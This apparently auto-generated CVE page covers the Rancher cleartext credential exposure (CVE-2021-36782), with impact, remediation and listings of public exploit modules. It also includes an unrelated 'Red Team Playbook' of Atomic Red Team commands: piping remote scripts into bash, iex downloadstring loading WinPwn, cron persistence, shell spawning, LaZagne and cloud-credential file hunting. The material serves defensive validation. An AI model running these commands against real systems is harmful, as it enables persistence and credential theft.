CVE-2021-36782
Overview
This vulnerability is a cleartext storage of sensitive information flaw rooted in improper handling of data confidentiality within SUSE Rancher's Kubernetes API interface. The core issue arises from the system exposing plaintext sensitive data to authenticated users with specific roles due to insufficient encryption or masking mechanisms. Affected components include the Rancher server versions prior to 2.5.16 and 2.6.7, particularly the API endpoints responsible for retrieving cluster and project configuration data.
Vulnerability Description
A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners, Project Members and User Base to use the Kubernetes API to retrieve plaintext version of sensitive data. This issue affects: SUSE Rancher Rancher versions prior to 2.5.16; Rancher versions prior to 2.6.7.
Impact
An attacker with authenticated access and appropriate roles can extract sensitive information in cleartext, facilitating unauthorized data disclosure and potential lateral movement within the cluster. The vulnerability requires low privileges (PR:L) and no user interaction (UI:N) but network access to the API (AV:N). This can lead to compromise of confidential configuration data, undermining cluster security and confidentiality, as indicated by the CVSS vector emphasizing high confidentiality, integrity, and availability impacts (C:H/I:H/A:H).
Solution
Remediation involves upgrading SUSE Rancher to versions 2.5.16 or later and 2.6.7 or later, as detailed in the SUSE bugzilla advisory 1193988 and the Rancher GitHub security advisory GHSA-g7j7-h4q8-8w2f. These updates address the plaintext exposure by implementing proper data encryption and access controls within the Kubernetes API. Administrators should consult these advisories for precise patching instructions and verify their Rancher deployment version to ensure the fix is applied.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in SUSE Rancher pertains to the cleartext storage of sensitive information, which poses a significant risk to the integrity and confidentiality of data managed within Kubernetes environments. This issue allows authenticated users, including Cluster Owners, Cluster Members, Project Owners, Project Members, and the User Base, to access plaintext versions of sensitive data through the Kubernetes API. The flaw is particularly concerning as it affects versions of SUSE Rancher prior to 2.5.16 and 2.6.7, leaving a substantial number of deployments vulnerable to unauthorized data exposure.
Exploitation of this vulnerability can occur through various attack vectors. Since the affected product allows authenticated users to interact with the Kubernetes API, an attacker with legitimate access could leverage this flaw to retrieve sensitive data, such as secrets, tokens, or configuration files, in an unencrypted format. This could be done through crafted API requests that exploit the lack of proper encryption mechanisms for sensitive information. Furthermore, if an attacker gains access to a compromised account, they could escalate their privileges and access even more critical data, leading to a broader compromise of the Kubernetes cluster.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on SUSE Rancher to manage their containerized applications. The exposure of sensitive data can lead to severe business risks, including data breaches, regulatory fines, and reputational damage. For instance, if an attacker retrieves API keys or database credentials, they could potentially access backend systems, leading to further exploitation and data loss. The high CVSS score of 9.9 indicates the critical nature of this vulnerability, emphasizing the urgent need for organizations to address it to avoid significant financial and operational repercussions.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, they should conduct an inventory of their SUSE Rancher deployments to identify any instances running vulnerable versions. Regular security assessments and vulnerability scans can help in identifying potential exposure points. Additionally, organizations should enforce strict access controls and implement the principle of least privilege to limit the number of users who can access sensitive data. Upgrading to the latest versions of SUSE Rancher that address this vulnerability is imperative, as it ensures that sensitive information is stored securely and reduces the attack surface.
In conclusion, the cleartext storage of sensitive information in SUSE Rancher represents a critical vulnerability that can have far-reaching consequences for organizations utilizing this platform. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare to defend against such threats. Implementing robust detection and mitigation strategies will not only safeguard sensitive data but also enhance the overall security posture of Kubernetes environments. Organizations must prioritize addressing this vulnerability to protect their assets and maintain trust with their customers and stakeholders.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Suse | Rancher | All |
cpe:2.3:a:suse:rancher:*:*:*:*:*:*:*:*
|
|
|
Suse | Rancher | All |
cpe:2.3:a:suse:rancher:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Rancher Authenticated API Credential Exposure
auxiliary/gather/rancher_authenticated_api_cred_exposure
|
h00die, Florian Struck, Marco Stuurman | Unknown | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
fe-ax/tf-cve-2021-36782
A Terraform module to launch Rancher 2.6.6 for blog article about CVE-2021-36782
|
fe-ax | 0 | 0 | 2022-12-01 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-37 | Retrieve Embedded Sensitive Data |
30%
|
High | Very High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-36782 |
| bugzilla.suse.com |
GitHub CVE
x_refsource_CONFIRM
|
https://bugzilla.suse.com/show_bug.cgi?id=1193988 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/rancher/rancher/security/advisories/GHSA-g7j7-h4q8-8w2f |